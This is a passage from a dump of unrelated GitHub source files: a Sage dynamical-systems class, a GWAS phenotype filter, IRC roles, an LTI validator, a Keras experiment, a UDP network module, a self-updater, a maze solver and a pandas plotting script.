AlgebraicScheme_subscheme_affine\n\n@add_metaclass(InheritComparisonClasscallMetaclass)\nclass DynamicalSystem(SchemeMorphism_polynomial):\n r\"\"\"\n Base class for dynamical systems of schemes.\n\n INPUT:\n\n - ``polys_or_rat_fncts`` -- a list of polynomials or rational functions,\n all of which should have the same parent\n\n - ``domain`` -- an affine or projective scheme, or product of\n projective schemes, on which ``polys`` defines an endomorphism.\n Subschemes are also ok\n\n - ``names`` -- (default: ``('X', 'Y')``) tuple of strings to be used\n as coordinate names for a projective space that is constructed\n\n The following combinations of ``morphism_or_polys`` and\n ``domain`` are meaningful:\n\n * ``morphism_or_polys`` is a SchemeMorphism; ``domain`` is\n ignored in this case\n\n * ``morphism_or_polys`` is a list of homogeneous polynomials\n that define a rational endomorphism of ``domain``\n\n * ``morphism_or_polys`` is a list of homogeneous polynomials and\n ``domain`` is unspecified; ``domain`` is then taken to be the\n projective space of appropriate dimension over the base ring of\n the first element of ``morphism_or_polys``\n\n * ``morphism_or_polys`` is a single polynomial or rational\n function; ``domain`` is ignored and taken to be a\n 1-dimensional projective space over the base ring 
of\n      ``morphism_or_polys`` with coordinate names given by ``names``\n\n    EXAMPLES::\n\n        sage: A.<x> = AffineSpace(QQ,1)\n        sage: f = DynamicalSystem_affine([x^2+1])\n        sage: type(f)\n        <class 'sage.dynamics.arithmetic_dynamics.affine_ds.DynamicalSystem_affine_field'>\n\n    ::\n\n        sage: P.<x,y> = ProjectiveSpace(QQ,1)\n        sage: f = DynamicalSystem_projective([x^2+y^2, y^2])\n        sage: type(f)\n        <class 'sage.dynamics.arithmetic_dynamics.projective_ds.DynamicalSystem_projective_field'>\n\n    ::\n\n        sage: P1.<x,y> = ProjectiveSpace(CC,1)\n        sage: H = End(P1)\n        sage: DynamicalSystem(H([y, x]))\n        Dynamical System of Projective Space of dimension 1 over Complex Field\n        with 53 bits of precision\n          Defn: Defined on coordinates by sending (x : y) to\n                (y : x)\n\n    :class:`DynamicalSystem` defaults to projective::\n\n        sage: R.<x,y,z> = QQ[]\n        sage: DynamicalSystem([x^2, y^2, z^2])\n        Dynamical System of Projective Space of dimension 2 over Rational Field\n          Defn: Defined on coordinates by sending (x : y : z) to\n                (x^2 : y^2 : z^2)\n\n    ::\n\n        sage: A.<x,y> = AffineSpace(QQ, 2)\n        sage: DynamicalSystem([y, x], domain=A)\n        Dynamical System of Affine Space of dimension 2 over Rational Field\n          Defn: Defined on coordinates by sending (x, y) to\n                (y, x)\n        sage: H = End(A)\n        sage: DynamicalSystem(H([y, x]))\n        Dynamical System of Affine Space of dimension 2 over Rational Field\n          Defn: Defined on coordinates by sending (x, y) to\n                (y, x)\n    \"\"\"\n\n    @staticmethod\n    def __classcall_private__(cls, morphism_or_polys, domain=None, names=None):\n        r\"\"\"\n        Return the appropriate dynamical system on a scheme.\n\n        EXAMPLES::\n\n            sage: R.<t> = QQ[]\n            sage: DynamicalSystem(t^2 - 3)\n            Dynamical System of Projective Space of dimension 1 over Rational Field\n              Defn: Defined on coordinates by sending (X : Y) to\n                    (X^2 - 3*Y^2 : Y^2)\n        \"\"\"\n        if isinstance(morphism_or_polys, SchemeMorphism_polynomial):\n            domain = morphism_or_polys.domain()\n        if not domain is None:\n            if is_AffineSpace(domain) or isinstance(domain, AlgebraicScheme_subscheme_affine):\n                from sage.dynamics.arithmetic_dynamics.affine_ds import DynamicalSystem_affine\n                return DynamicalSystem_affine(morphism_or_polys, domain)\n\n        from sage.dynamics.arithmetic_dynamics.projective_ds import DynamicalSystem_projective\n        return DynamicalSystem_projective(morphism_or_polys, domain, names)\n\n    def __init__(self, polys_or_rat_fncts, domain):\n        r\"\"\"\n        The Python constructor.\n\n        EXAMPLES::\n\n            sage: from sage.dynamics.arithmetic_dynamics.generic_ds import DynamicalSystem\n            sage: P.<x,y> = ProjectiveSpace(QQ,1)\n            sage: f = DynamicalSystem_projective([x^2+y^2, y^2])\n            sage: isinstance(f, DynamicalSystem)\n            True\n        \"\"\"\n        H = End(domain)\n        # All consistency checks are done by the public class constructors,\n        # so we can set check=False here.\n        SchemeMorphism_polynomial.__init__(self, H, polys_or_rat_fncts, check=False)\n\n    def _repr_type(self):\n        r\"\"\"\n        Return a string representation of the type of a dynamical system.\n\n        OUTPUT: string\n\n        EXAMPLES::\n\n            sage: PS.<x,y> = ProjectiveSpace(QQ,1)\n            sage: f = DynamicalSystem_projective([x^3, x*y^2])\n            sage: f._repr_type()\n            'Dynamical System'\n        \"\"\"\n        return \"Dynamical System\"\n\n    def _repr_(self):\n        r\"\"\"\n        Return a string representation of a dynamical system.\n\n        OUTPUT: string\n\n        EXAMPLES::\n\n            sage: PS.<x,y> = ProjectiveSpace(QQ,1)\n            sage: f = DynamicalSystem_projective([x^3, x*y^2])\n            sage: f._repr_()\n            'Dynamical System of Projective Space of dimension 1 over Rational Field\\n\n            Defn: Defined on coordinates by sending (x : y) to\\n (x^3 : x*y^2)'\n        \"\"\"\n        s = \"%s of %s\"%(self._repr_type(), self.domain())\n        d = self._repr_defn()\n        if d != '':\n            s += \"\\n Defn: %s\"%('\\n '.join(self._repr_defn().split('\\n')))\n        return s\n\n    def as_scheme_morphism(self):\n        \"\"\"\n        Return this dynamical system as :class:`SchemeMorphism_polynomial`.\n\n        OUTPUT: :class:`SchemeMorphism_polynomial`\n\n        EXAMPLES::\n\n            sage: P.<x,y,z> = ProjectiveSpace(ZZ, 2)\n            sage: f = DynamicalSystem_projective([x^2, y^2, z^2])\n            sage: type(f.as_scheme_morphism())\n            <class 'sage.schemes.projective.projective_morphism.SchemeMorphism_polynomial_projective_space'>\n\n        ::\n\n            sage: P.<x,y> = ProjectiveSpace(QQ, 1)\n            sage: f = DynamicalSystem_projective([x^2-y^2, y^2])\n            sage: type(f.as_scheme_morphism())\n            <class 'sage.schemes.projective.projective_morphism.SchemeMorphism_polynomial_projective_space_field'>\n\n        ::\n\n            sage: P.<x,y> = ProjectiveSpace(GF(5), 1)\n            sage: f = DynamicalSystem_projective([x^2, y^2])\n            sage: type(f.as_scheme_morphism())\n            <class 'sage.schemes.projective.projective_morphism.SchemeMorphism_polynomial_projective_space_finite_field'>\n\n        ::\n\n            sage: A.<x,y> = AffineSpace(ZZ, 2)\n            sage: f = DynamicalSystem_affine([x^2-2, y^2])\n            sage: type(f.as_scheme_morphism())\n            <class 'sage.schemes.affine.affine_morphism.SchemeMorphism_polynomial_affine_space'>\n\n        ::\n\n            sage: A.<x,y> = AffineSpace(QQ, 2)\n            sage: f = DynamicalSystem_affine([x^2-2, y^2])\n            sage: type(f.as_scheme_morphism())\n            <class 'sage.schemes.affine.affine_morphism.SchemeMorphism_polynomial_affine_space_field'>\n\n        ::\n\n            sage: A.<x,y> = AffineSpace(GF(3), 2)\n            sage: f = DynamicalSystem_affine([x^2-2, y^2])\n            sage: type(f.as_scheme_morphism())\n            <class 'sage.schemes.affine.affine_morphism.SchemeMorphism_polynomial_affine_space_finite_field'>\n        \"\"\"\n        H = End(self.domain())\n        return H(list(self))\n\n    def change_ring(self, R, check=True):\n        r\"\"\"\n        Return a new dynamical system which is this map coerced to ``R``.\n\n        If ``check`` is ``True``, then the initialization checks are performed.\n\n        INPUT:\n\n        - ``R`` -- ring or morphism\n\n        OUTPUT:\n\n        A new :class:`DynamicalSystem_projective` that is this map\n        coerced to ``R``.\n\n        EXAMPLES::\n\n            sage: P.<x,y> = ProjectiveSpace(ZZ, 1)\n            sage: f = DynamicalSystem_projective([3*x^2, y^2])\n            sage: f.change_ring(GF(5))\n            Dynamical System of Projective Space of dimension 1 over Finite Field of size 5\n              Defn: Defined on coordinates by sending (x : y) to\n                    (-2*x^2 : y^2)\n        \"\"\"\n        f = self.as_scheme_morphism()\n        F = f.change_ring(R)\n        return F.as_dynamical_system()\n\n    def specialization(self, D=None, phi=None, homset=None):\n        r\"\"\"\n        Specialization of this dynamical system.\n\n        Given a family of maps defined over a polynomial ring. A\n        specialization is a particular member of that family. The\n        specialization can be specified either by a dictionary or\n        a :class:`SpecializationMorphism`.\n\n        INPUT:\n\n        - ``D`` -- (optional) dictionary\n\n        - ``phi`` -- (optional) SpecializationMorphism\n\n        - ``homset`` -- (optional) homset of specialized map\n\n        OUTPUT: :class:`DynamicalSystem`\n\n        EXAMPLES::\n\n            sage: R.<c> = PolynomialRing(QQ)\n            sage: P.<x,y> 
= ProjectiveSpace(R, 1)\n sage: f = DynamicalSystem_projective([x^2 + c*y^2,y^2], domain=P)\n sage: f.specialization({c:1})\n Dynamical System of Projective Space of dimension 1 over Rational Field\n Defn: Defined on coordinates by sending (x : y) to\n (x^2 + y^2 : y^2)\n \"\"\"\n F = self.as_scheme_morphism().specialization(D, phi, homset)\n return F.as_dynamical_system()\n\n","repo_name":"filipion/coding-theory","sub_path":"src/sage/dynamics/arithmetic_dynamics/generic_ds.py","file_name":"generic_ds.py","file_ext":"py","file_size_in_byte":11381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24615914762","text":"#!/usr/bin/env python3\n\n\"\"\"\nInput:\n-- FAM file : the fam file of the data we want to analyse\n-- data is the phenotype file, likely a superset of PLINK data\n-- cov_list : list of comma-separated strings\n-- pheno : single phenotype label\n-- dataout : name of a phenotype file that gets created by the script. There is guaranteed no missing phenotype data in the file, and\n only contains individuals described in the fam file -- not guaranteed that it's in the same order as the fam file\n-- ind_list: subset of the individuals in the fam file for (a) no missing genotype data (b) no missing phenotype data\n\n\"\"\"\n\nimport sys\nimport pandas as pd\nimport argparse\nimport numpy as np\n\n\n\n\ndef check_missing(x):\n if x in [\"NA\",\"na\",\"null\",\"-9\"] or ((type(x)==type(\"x\")) and (len(x)<1)) or x==-9 or x==r\"\\N\" or x==\"-\":\n return 1\n else:\n return 0\n\ndef parseArguments():\n parser = argparse.ArgumentParser(description='fill in missing bim values')\n parser.add_argument('--inp_fam',type=str,required=True)\n parser.add_argument('--data',type=str,required=True,help=\"File with phenotype and covariate data\")\n parser.add_argument('--cov_list', type=str,help=\"comma separated list of covariates\",default=\"\")\n parser.add_argument('--pheno',type=str,required=True,help=\"single phenotype\")\n parser.add_argument('--dataout',type=str,required=True,help=\"File with output pheno\")\n parser.add_argument('--lindout',type=str,required=True,help=\"File with list of good individuals FID IID \")\n args = parser.parse_args()\n return args\n\ndef getColNames(label_str):\n col_names = []\n col_fns = []\n for lab in label_str:\n det = lab.split(\"/\")\n if len(det)>1:\n col_names.append(det[0])\n col_fns.append(eval(det[1]))\n else:\n col_names.append(lab)\n col_fns.append(False)\n return col_names,col_fns\n\ndef errorMessage10(phe):\n print(\"\"\"\n\n A problem has been detected in file <%s> column <%s>.\n\n There is some invalid data. 
I regret I can't tell you which row.\n\n\n Please check -- the data should be numeric only.\n\n\n If there is missing data, please use NA\n\n\n\n \"\"\"%(args.data,phe))\n\n\nargs = parseArguments()\n\nTAB =chr(9)\nEOL=chr(10)\n\n\nphenos = [args.pheno]\nuse = [\"FID\",\"IID\"]\nif args.cov_list:\n phenos+= list(set([x for x in args.cov_list.split(\",\") if len(x)>0]))\n\n#read of fam \nreadfam=open(args.inp_fam)\nlisteFID=[]\nfor Lines in readfam :\n SplL=Lines.split()\n listeFID.append(SplL[0]+\"-\"+SplL[1])\nreadfam.close()\n\nreaddata=open(args.data)\nEnteteFile=readdata.readline().split()\nUsePos=[]\n## search position of interest\nuseAll=use+phenos\nfor Ent in useAll :\n if Ent not in EnteteFile :\n sys.exit(EOL*3+\"column %s not find in file %s\"%(Ent,args.data))\n UsePos.append(EnteteFile.index(Ent))\n\nwritenewdata=open(args.dataout,'w')\nwritenewdata.write(\"\\t\".join(useAll)+\"\\n\")\nwritelind=open(args.lindout,'w')\nfor line in readdata : \n splline=line.split() \n if splline[UsePos[0]]+\"-\"+splline[UsePos[1]] in listeFID:\n if sum([check_missing(splline[x]) for x in UsePos[2:]])==0 :\n NewInf=[splline[x] for x in UsePos]\n writelind.write(NewInf[0]+\"\\t\"+NewInf[1]+\"\\n\")\n writenewdata.write(\"\\t\".join(NewInf)+\"\\n\")\n\nwritenewdata.close()\nwritelind.close()\nreaddata.close()\n\n\n\n\n\n\n","repo_name":"h3abionet/h3agwas","sub_path":"assoc/bin/list_ind_nomissing.py","file_name":"list_ind_nomissing.py","file_ext":"py","file_size_in_byte":3334,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"68"} +{"seq_id":"15637337550","text":"from mammon.utility import CaseInsensitiveList\n\ndefault_whois_format = 'is a {role}.'\ndefault_vowel_whois_format = 'is an {role}.'\n\nclass Role:\n def __init__(self, ctx, name, roles=None, extends=None, **kwargs):\n self.ctx = ctx\n self.name = name\n\n # defaults\n self.metakeys_get = []\n self.metakeys_set = []\n self.metakeys_access = []\n self.capabilities = []\n self.title = ''\n self.whois_format = None\n\n for k, v in kwargs.items():\n if v:\n setattr(self, k, v)\n\n # metadata\n for key in self.metakeys_access:\n if key not in self.metakeys_get:\n self.metakeys_get.append(key)\n if key not in self.metakeys_set:\n self.metakeys_set.append(key)\n del self.metakeys_access\n\n self.metakeys_get = CaseInsensitiveList(self.metakeys_get)\n self.metakeys_set = CaseInsensitiveList(self.metakeys_set)\n\n # automatically choose a/an for whois message\n if self.whois_format is None:\n self.whois_format = default_whois_format\n for character in self.title:\n if character.isalpha() and character.lower() in ['a', 'e', 'i', 'o', 'u']:\n self.whois_format = default_vowel_whois_format\n break\n elif character.isalpha():\n break\n\n self.whois_line = self.whois_format.format(role=self.title)\n\n # extending roles\n if roles is None:\n roles = self.ctx.roles\n\n if extends and extends in roles:\n role = roles.get(extends)\n for capability in role.capabilities:\n if capability not in self.capabilities:\n self.capabilities.append(capability)\n for key in role.metakeys_get:\n if key not in self.metakeys_get:\n self.metakeys_get.append(key)\n for key in role.metakeys_set:\n if key not in self.metakeys_set:\n self.metakeys_set.append(key)\n elif extends:\n print('mammon: error: error in role', name, '- extending role', extends, 'does not 
exist')\n","repo_name":"mammon-ircd/mammon","sub_path":"mammon/roles.py","file_name":"roles.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"68"} +{"seq_id":"315947714","text":"import datetime\nimport logging\n\nfrom django.core.cache import caches\nfrom oauthlib import oauth1\n\nfrom lti_provider.models import Consumer\nfrom lti_provider import lti_settings\n\nlogger = logging.getLogger(__name__)\n\n\nclass RequestValidator(oauth1.RequestValidator):\n\n def __init__(self):\n super(RequestValidator, self).__init__()\n self.consumer = None\n self.cache = caches['lti_cache']\n\n @property\n def enforce_ssl(self):\n try:\n ssl = lti_settings.LTI_SSL\n except AttributeError:\n ssl = True\n return ssl\n\n def validate_timestamp_and_nonce(self, client_key, timestamp, nonce, request):\n \"\"\"\n Validate LTI request's timestamp and nonce\n\n Timestamp is validated to be equal or greater than the timestamp used in previous requests from certain\n LTI Consumer.\n\n Nonce is validating to be unique in the time frame which is by default equal to 10 seconds.\n Time frame could be configured in the StarCellBio settings as a TIMEOUT parameter of the CACHES['lti_cache']\n\n :param client_key: client key from LTI request\n :param timestamp: timestamp from LTI request\n :param nonce: nonce from LTI request\n :param request: LTI request\n :return: boolean flag\n \"\"\"\n message = \"LTI request's {} is not valid.\"\n\n logger.debug('Timestamp validating is started.')\n timestamp = int(timestamp)\n timestamp_key = '{}_timestamp'.format(client_key)\n cache_timestamp = self.cache.get(timestamp_key, timestamp)\n if cache_timestamp > timestamp:\n logger.debug(message.format('timestamp'))\n return False\n self.cache.set(timestamp_key, timestamp)\n logger.debug('Timestamp is valid.')\n\n logger.debug('Nonce validating is started.')\n if self.cache.get(nonce):\n logger.debug(message.format('nonce'))\n return False\n self.cache.set(nonce, 1)\n logger.debug('Nonce is valid.')\n return True\n\n def validate_client_key(self, client_key, request):\n \"\"\"\n Validate client key exists and is not expired\n\n :param client_key: client key from LTI request\n :param request: LTI request\n :return: boolean flag\n \"\"\"\n logger.debug('Consumer key relevance validating is started.')\n try:\n self.consumer = Consumer.objects.get(consumer_key=client_key)\n except Consumer.DoesNotExist:\n logger.error('Consumer with the key {} is not found.'.format(client_key))\n return False\n today = datetime.date.today()\n consumer_expired_date = self.consumer.expiration_date\n if consumer_expired_date and consumer_expired_date < today:\n logger.error('Consumer Key is expired.')\n return False\n return True\n\n def get_client_secret(self, client_key, request):\n \"\"\"\n Retrieve secret key storing in the LTI Consumer\n\n :param client_key: client key from LTI request\n :param request: LTI request\n :return: secret key\n \"\"\"\n logger.debug('Client secret getting is started.')\n return self.consumer.consumer_secret\n","repo_name":"starteam/starcellbio_html","sub_path":"lti_provider/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"19209103531","text":"from collections.abc import Iterable\nfrom typing import TYPE_CHECKING\n\n\nif TYPE_CHECKING:\n import dbus\n\n\ndef _get_bus() -> \"dbus.SystemBus\":\n import 
dbus\n\n return dbus.SystemBus()\n\n\nclass LogindDBusException(RuntimeError):\n \"\"\"Indicates an error communicating to Logind via DBus.\"\"\"\n\n\ndef list_logind_sessions() -> Iterable[tuple[str, dict]]:\n \"\"\"List running logind sessions and their properties.\n\n Returns:\n list of (session_id, properties dict):\n A list with tuples of sessions ids and their associated properties\n represented as dicts.\n \"\"\"\n import dbus\n\n try:\n bus = _get_bus()\n login1 = bus.get_object(\"org.freedesktop.login1\", \"/org/freedesktop/login1\")\n\n sessions = login1.ListSessions(dbus_interface=\"org.freedesktop.login1.Manager\")\n\n results = []\n for session_id, path in [(s[0], s[4]) for s in sessions]:\n session = bus.get_object(\"org.freedesktop.login1\", path)\n properties_interface = dbus.Interface(\n session, \"org.freedesktop.DBus.Properties\"\n )\n properties = properties_interface.GetAll(\"org.freedesktop.login1.Session\")\n results.append((session_id, properties))\n except dbus.exceptions.DBusException as error:\n raise LogindDBusException(error) from error\n\n return results\n","repo_name":"languitar/autosuspend","sub_path":"src/autosuspend/util/systemd.py","file_name":"systemd.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"68"} +{"seq_id":"38402379908","text":"import numpy as np\n\nimport pandas as pd\nimport keras\nimport tensorflow as tf\nimport keras.backend as K\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.utils.vis_utils import plot_model\n\nfrom skopt.space import Space\nfrom skopt.sampler import Lhs\n\nfrom tauGrad import *\n\n\"\"\"\nGiven tau_w(u_LES, h) through an implicit equation \nwe want to convert it into tau_w(u_LES, u_w, h)\nsuch that u_w \\cdot tau_w > 0\nto ensure kinetic energy stability\nStep 1:\nQuestion: Can a neural network approximate the law of the wall?\nAnswer: It requires some tuning, but seems to give reasonable results\nStep 2:\nQuestion: Can we customize the neural network so that tau.u_w is always positive?\nStep 3:\nNon-dimensionalize and check if it generalizes\n\"\"\"\n\nwm_data = pd.read_csv(\"wm_data.csv\")\n\nx_smpls = pd.DataFrame(data=wm_data, columns=[\"h\", \"u_L\", \"u_w\"]) \ny = pd.DataFrame(data=wm_data, columns=[\"tau\"]) \n\n# define the keras model\nmodel = Sequential()\n# Add layers\n\"\"\"\nRepeat a few times before finalizing network \n\"\"\"\nmodel.add(Dense(15, input_dim=3, activation='relu'))\nmodel.add(Dense(15, activation='relu'))\nmodel.add(Dense(15, activation='relu'))\nmodel.add(Dense(15, activation='relu'))\nmodel.add(Dense( 1, activation='tanh'))\n\n#Examine the model\nprint(model.summary())\n\n\n########################################\n## Test a functionality\ndef mean_pred(y_true, y_pred):\n return K.mean(y_pred)\n########################################\n\n########################################\n#First let us do a custom loss function\n# Define custom loss\ndef custom_loss():\n\n def loss(y_true,y_pred):\n return K.mean( K.square(K.square( y_pred ) - y_true) )\n\n # Return a function\n return loss\n\n## END FUNCTION \n########################################\n\n# compile the keras model\n#model.compile(loss=custom_loss(), optimizer='adam', metrics=[mean_pred])\nmodel.compile(loss=custom_loss(), optimizer='adam')\n# fit the keras model on the dataset\nmodel.fit(x_smpls, y, validation_split=0.3, epochs=50, verbose=2)\n\nweights = model.get_weights()\n\nspace = Space([(10., 100.), (2., 
4.), (-1., 1.)])\nlhs = Lhs(lhs_type=\"classic\", criterion=None)\nx_n = lhs.generate(space.dimensions, 10)\n\nx_tst = pd.DataFrame(data=x_n, columns=[\"h\", \"u_L\", \"u_w\"]) \nn_smpls = x_smpls.shape[0]\n\ny_prd = K.square( model.predict(x_tst) )\n\nnu = 0.001\nfor it, i in enumerate(x_n):\n h = i[0]\n u_L = i[1]\n\n tau = getTau(nu, h, u_L) \n\n tf.print(i, tau, [y_prd[it]])\n\n\n\n","repo_name":"vikramsg/Experiments","sub_path":"python/ML/wm/run_keras.py","file_name":"run_keras.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"12416552127","text":"from LibPeer.Networks import Network\nfrom LibPeer.Formats.BinaryAddress import BinaryAddress\nfrom LibPeer.Logging import log\n\nimport socket\nimport threading\nimport rx\nimport traceback\n\nclass Ipv4(Network):\n identifier = b\"IPv4\"\n\n def __init__(self, options: dict):\n super().__init__(options)\n self._socket = None\n\n\n def go_up(self) -> bool:\n \"\"\"Attempt to get the network ready to used. Returns true on success\"\"\"\n try:\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self._socket.bind((self.options[\"address\"], self.options[\"port\"]))\n self.up = True\n\n threading.Thread(target=self._listen).start()\n return True\n\n except:\n return False\n\n \n def _listen(self):\n while self.up:\n try:\n data, addr = self._socket.recvfrom(65536)\n address = BinaryAddress(self.identifier, addr[0].encode(\"utf-8\"), str(addr[1]).encode(\"utf-8\"))\n self.incoming.on_next((data, address))\n\n except Exception as e:\n log.error(\"Exception on listener thread: \" + str(e))\n tb = traceback.format_exc()\n for line in tb.split(\"\\n\"):\n log.error(line)\n \n log.info(\"Listening stopped.\")\n\n\n def go_down(self,):\n \"\"\"Shut down the network interface\"\"\"\n self.up = False\n self._socket.close()\n\n\n def send(self, data: bytes, address: BinaryAddress) -> rx.Observable:\n \"\"\"Send the specified data to the specified address\"\"\"\n def send_it():\n self._socket.sendto(data, (address.network_address, int(address.network_port)))\n\n return rx.Observable.from_callable(send_it)\n","repo_name":"Tilo15/LibPeer-Python","sub_path":"LibPeer/Networks/Ipv4/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2717117033","text":"import glob\nimport os\nimport shutil\nimport sys\nfrom base64 import b64decode\n\nimport requests\nimport simplejson as json\nfrom packaging import version\n\nfrom the_challenge import __version__\nfrom the_challenge.misc import get_most_recent_version_and_files, check_internet_connection\n\n\n# FUNCTIONS\ndef update_the_challenge():\n \"\"\"\n Updates the local copy of The Challenge.\n \"\"\"\n\n # Check if the user is online\n if not check_internet_connection():\n print(\"You are not connected to the internet. 
Try again later.\")\n sys.exit()\n\n # Get the latest version\n most_recent_version, most_recent_files = get_most_recent_version_and_files()\n\n # Get local version\n local_version = __version__\n\n # Check if local version is smaller than the GitHub version\n if version.parse(local_version) < version.parse(most_recent_version):\n print(f\"There is a new version, {most_recent_version}, available.\\n(Installed Version: {__version__})\\n\")\n\n while True:\n print(\"Do you want to update to the new version?\")\n want_to_update = input(\"[Y]es or [N]o: \").upper()\n\n if want_to_update not in [\"Y\", \"N\"]:\n print(\"Please enter either 'Y' or 'N'.\\n\")\n elif want_to_update == \"N\":\n print(\"Keeping local version. Quitting now.\")\n sys.exit()\n else:\n print(\"Starting update process...\")\n break\n else:\n print(\"You are already on the latest version. Quitting the program now.\")\n sys.exit()\n\n print()\n\n # Get the latest distribution file\n distribution_url = \"\"\n for file in most_recent_files:\n if file[\"path\"].find(\"The-Challenge-Production-Server_\") != -1:\n distribution_url = file[\"url\"]\n break\n\n # Download the latest distribution\n if distribution_url != \"\":\n print(\"Downloading latest distribution...\")\n download_request = requests.get(distribution_url)\n download_request.raise_for_status()\n print(\"Done!\")\n\n print(\"Writing distribution package contents to file...\")\n with open(\"./The-Challenge_Latest-Dist.tar.gz\", \"wb+\") as f:\n f.write(b64decode(json.loads(download_request.text)[\"content\"]))\n f.close()\n print(\"Done!\")\n\n else:\n print(\"Can't get the latest distribution. Try again later.\")\n sys.exit()\n\n # Extract the latest distribution\n print(\"Extracting contents of latest distribution...\")\n shutil.unpack_archive(\"The-Challenge_Latest-Dist.tar.gz\", \"./extracted\")\n os.remove(\"./The-Challenge_Latest-Dist.tar.gz\")\n print(\"Done!\")\n\n # Recursively try to find the wheel file in the extracted folder\n try:\n latest_wheel_file = [f for f in glob.glob(\"./extracted/\" + \"**/*.whl\", recursive=True)][0]\n\n # Once found install it using pip\n os.system(f\"pip install -U {latest_wheel_file}\")\n\n print(\"The update was completed successfully.\")\n\n except IndexError:\n print(\"The latest distribution file cannot be found. Quitting now...\")\n sys.exit()\n\n # Clean up\n shutil.rmtree(\"./extracted\")\n\n # Offer to automatically restart the service\n print(\"\\n!!! IMPORTANT !!!\")\n print(\"Only answer 'Y' to the following prompt if you (a) are on Ubuntu; (b) have a systemd service that \"\n \"hosts The Challenge's server; and (c) are an administrator that can use the 'sudo' command.\")\n print(\"!!! 
IMPORTANT !!!\\n\")\n\n    while True:\n        print(\"Would you like to restart the systemd service?\")\n        confirm_systemd_name = input(\"[Y]es or [N]o: \").upper()\n\n        if confirm_systemd_name not in [\"Y\", \"N\"]:\n            print(\"Please enter either 'Y' or 'N'.\\n\")\n        elif confirm_systemd_name == \"N\":\n            print(\"Quitting now.\")\n            sys.exit()\n        else:\n            break\n\n    # Ask user to input the systemd service name\n    while True:\n        print(\"Please enter the systemd service name.\")\n        systemd_service_name = input(\"?> \")\n\n        if systemd_service_name == \"\":\n            print(\"Please enter the name.\")\n        else:\n            print(\"\\nPlease confirm that you want to restart the systemd service named:\")\n            print(f\"'{systemd_service_name}'\")\n\n            while True:\n                confirm_systemd_name = input(\"[Y]es or [N]o: \").upper()\n\n                if confirm_systemd_name not in [\"Y\", \"N\"]:\n                    print(\"Please enter either 'Y' or 'N'.\\n\")\n                    print(\"Please confirm the systemd service name.\")\n                elif confirm_systemd_name == \"N\":\n                    print(\"Disregarding current input of the systemd service name.\")\n                    break\n                else:\n                    os.system(f\"sudo systemctl restart {systemd_service_name}\")\n                    print(\"The systemd service has been restarted. Quitting.\")\n                    sys.exit()\n","repo_name":"PhotonicGluon/The-Challenge","sub_path":"the_challenge/commandLine.py","file_name":"commandLine.py","file_ext":"py","file_size_in_byte":4942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
+{"seq_id":"29250047702","text":"from collections import deque\nfrom typing import List\n\n# BFS with distance relaxation: from each stop the ball rolls in a straight\n# line until it hits a wall, and shorter rolled distances overwrite longer ones.\nclass Solution:\n    def shortestDistance(self, maze: List[List[int]], start: List[int], destination: List[int]) -> int:\n        \n        ROWS, COLS = len(maze), len(maze[0])\n        \n        dist = [[float(\"inf\")] * COLS for _ in range(ROWS)]\n        dist[start[0]][start[1]] = 0\n        Q = deque([(start[0], start[1])])\n        \n        while Q:\n            row, col = Q.popleft()\n            \n            for x, y in (1, 0), (-1, 0), (0, 1), (0, -1):\n                r, c = row + x, col + y\n                count = 0\n                while 0 <= r < ROWS and 0 <= c < COLS and maze[r][c] == 0:\n                    r += x\n                    c += y\n                    count += 1\n\n                r -= x\n                c -= y\n                \n                if dist[row][col] + count < dist[r][c]:\n                    Q.append((r, c))\n                    dist[r][c] = dist[row][col] + count\n        \n        ret = dist[destination[0]][destination[1]]\n        \n        return ret if ret != float(\"inf\") else -1\n        \n","repo_name":"shivaAcharya/LeetCode","sub_path":"505-the-maze-ii/505-the-maze-ii.py","file_name":"505-the-maze-ii.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
+{"seq_id":"73200357338","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nimport re\nimport os\ndef process_excel_data(file_path, x_column, y_column):\n    # Read the Excel file\n    data = pd.read_excel(file_path)\n    # If the x-axis values are numeric, skip plotting\n    if isinstance(data[x_column].iloc[0], (int, float)):\n        print(\"X-axis data is numeric, skipping the plot.\")\n        return\n\n    # Use a font with Chinese glyph support\n    plt.rcParams['font.family'] = 'SimHei'  # SimHei renders the Chinese column labels\n    plt.rcParams['font.size'] = 8  # set the font size\n\n    # Extract the two target columns, then group, deduplicate and sum\n    grouped_data = data.groupby(x_column)[y_column].sum()\n    y_data = [item for item in grouped_data.index.astype(str) if \"行业\" not in item or len(item) > 2]\n    x_data = [int(re.sub(r'\\D', '', str(item))) for item in grouped_data.values.astype(str) if '-' not in str(item)]\n    min_y_value = 0  # set the y-axis minimum to 0\n\n    # Draw the chart\n    fig, ax = plt.subplots(figsize=(10, 6))  # set the figure size\n    ax.bar(y_data, x_data)\n    ax.set_xlabel('行业')\n    ax.set_ylabel('数量')\n    ax.tick_params(axis='x', rotation=90)  # display x-axis labels vertically\n    ax.set_ylim(bottom=min_y_value)  # set the y-axis minimum\n    today = datetime.today().strftime('%Y-%m-%d')  # format the current date as a string\n    ax.set_title(f'({today})')  # use the current date as the title\n    plt.tight_layout()  # auto-adjust the layout so labels don't overlap\n\n    # Add a scrollbar\n    plt.subplots_adjust(bottom=0.2)  # leave room at the bottom for the scrollbar\n    ax.set_xlim([-1, len(y_data)])\n    print(today)\n    plt.savefig(f'{today}.png')  # save the generated chart locally\n    plt.show()\n\nfile_path = 